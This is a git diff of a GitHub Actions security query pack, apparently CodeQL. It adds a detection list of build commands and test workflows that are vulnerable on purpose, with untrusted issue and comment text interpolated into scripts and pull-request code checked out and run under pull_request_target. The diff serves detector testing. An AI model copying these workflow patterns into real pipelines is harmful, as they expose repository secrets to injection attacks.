https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 +private string dangerousCommands() { + result = + [ + "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", + "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", + "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ", + "^ant ", "mkdocs build", "pytest" + ] +} + +class BuildRunStep extends PoisonableStep, Run { + BuildRunStep() { + exists(UntrustedArtifactDownloadStep step | + step.getAFollowingStep() = this and + exists( + this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _) + ) + ) + } +} + +class LocalCommandExecutionRunStep extends PoisonableStep, Run { + LocalCommandExecutionRunStep() { exists(UntrustedArtifactDownloadStep step | step.getAFollowingStep() = this and // Heuristic: - // Run step with a command starting with `./xxxx`, `sh xxxx`, `node xxxx`, ... - // eg: `./test.sh`, `sh test.sh`, `node test.js`, ... - this.getScript() - .trim() - .regexpMatch(".*(./|(node|python|ruby|sh)\\s+)" + step.getPath() + ".*") + // Run step with a command starting with `./xxxx`, `sh xxxx`, ... + exists( + this.getScript() + .splitAt("\n") + .trim() + .regexpFind("([^a-z]|^)(./|(ba|z|fi)?sh\\s+)" + step.getPath(), _, _) + ) ) } } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml new file mode 100644 index 00000000000..ad9187a3d6b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml @@ -0,0 +1,135 @@ +name: Poutine Level 0 +on: + issues: + types: [opened, edited] + issue_comment: + types: [created, edited] + pull_request_target: + types: [opened, synchronize] + branches: + - main + pull_request: + types: [closed] + branches: + - main + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + fries: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issues' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_FRIES: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_FRIES }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: rlespinasse/github-slug-action@v4 + with: + short-length: 8 + - name: Check for profanities in issue body + id: check_profanities + run: | + echo "Checking issue body for profanities..." + PROFANITIES_LIST="bad|disguting|horrible" + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + echo "Profanity detected in issue body. Please clean up the language." + exit 1 + else + echo "No profanities found in issue body." + exit 0 + fi + + cheddar: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issue_comment' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_CHEDDAR: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_CHEDDAR }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Mini Chat Bot + uses: actions/github-script@v5 + with: + script: | + const commentBody = "${{ github.event.comment.body }}"; + let response; + if (commentBody.includes("hello")) { + response = "Hello! How can I help you today?"; + } else if (commentBody.includes("help")) { + response = "Sure, what do you need help with?"; + } else { + response = "Sorry, I didn't understand that. Can you try again?"; + } + + github.rest.issues.createComment({ + issue_number: context.payload.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: response + }); + + gravy: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request_target' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_GRAVY: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_GRAVY }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + npm start + + toppings: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_TOPPINGS: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_TOPPINGS }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml new file mode 100644 index 00000000000..826051dfc5a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml @@ -0,0 +1,37 @@ +name: Poutine Level 1 +on: + workflow_run: + workflows: ["Poutine Level 0"] + types: + - completed + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + toppings-for-realz: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'workflow_run' && github.event.workflow_run.event == 'pull_request' + permissions: + id-token: write + contents: write + pull-requests: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ: ${{ secrets.FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: actions/first-interaction@v1 + with: + repo-token: ${{ secrets.GITHUB_TOKEN }} + issue-message: 'Message that will be displayed on users first issue' + pr-message: 'Message that will be displayed on users first pr' + - name: Log test executions + run: | + echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index f242e0e9e68..785aaa383eb 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -153,6 +153,9 @@ nodes | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index ec9a5e5238a..5b2dac260de 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -153,6 +153,9 @@ nodes | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -269,6 +272,9 @@ subpaths | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml new file mode 100644 index 00000000000..905a4eaccb1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo + unzip foo/artifact_name.zip + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml new file mode 100644 index 00000000000..49908b7b4c5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml @@ -0,0 +1,136 @@ +name: Poutine Level 0 +on: + issues: + types: [opened, edited] + issue_comment: + types: [created, edited] + pull_request_target: + types: [opened, synchronize] + branches: + - main + pull_request: + types: [closed] + branches: + - main + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + fries: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issues' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_FRIES: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_FRIES }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: rlespinasse/github-slug-action@v4 + with: + short-length: 8 + - name: Check for profanities in issue body + id: check_profanities + run: | + echo "Checking issue body for profanities..." + PROFANITIES_LIST="bad|disguting|horrible" + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + echo "Profanity detected in issue body. Please clean up the language." + exit 1 + else + echo "No profanities found in issue body." + exit 0 + fi + + cheddar: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issue_comment' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_CHEDDAR: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_CHEDDAR }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Mini Chat Bot + uses: actions/github-script@v5 + with: + script: | + const commentBody = "${{ github.event.comment.body }}"; + let response; + if (commentBody.includes("hello")) { + response = "Hello! How can I help you today?"; + } else if (commentBody.includes("help")) { + response = "Sure, what do you need help with?"; + } else { + response = "Sorry, I didn't understand that. Can you try again?"; + } + + github.rest.issues.createComment({ + issue_number: context.payload.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: response + }); + + gravy: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request_target' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_GRAVY: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_GRAVY }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + npm start + + toppings: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_TOPPINGS: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_TOPPINGS }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index 6bcdcbb4291..1160497a4a3 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -13,3 +13,10 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 99f9fb0e540..429a4cdc0c5 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -6,6 +6,7 @@ edges | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | @@ -26,6 +27,8 @@ nodes | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected index ca1fef5fa85..ba635b1d74d 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected @@ -6,6 +6,7 @@ edges | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | @@ -26,6 +27,8 @@ nodes | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | @@ -45,6 +48,7 @@ subpaths | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Run Step | | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Run Step | | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Run Step | | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Run Step | | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Run Step | | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 7bee36029d6..0ba7832e8e8 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -13,4 +13,5 @@ | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index 27f6bbca39c..4913ed2d100 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -18,8 +18,10 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 1a44d83ddbe4c1868884ac0c4b59c6ba79313851 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 17:58:40 +0200 Subject: [PATCH 0205/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 64e2861cf68..64f57746a88 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.11 +version: 0.0.12 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c769ea06d0b..c796ff5ee40 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.11 +version: 0.0.12 groups: - actions - queries From 46d2bb24e52c2031ed0b95bcb90bd6e15177e2e4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 20 Apr 2024 22:57:22 +0200 Subject: [PATCH 0206/1267] Fix expression always true query --- ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql | 1 + ql/src/qlpack.yml | 2 +- 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 64f57746a88..4364e979f91 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.12 +version: 0.0.13 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql index 0a951cbabe1..b631b5f17b3 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql @@ -15,6 +15,7 @@ import actions from If i where + i.getCondition().matches("%${{%") and i.getConditionStyle() = ["|", ">"] or 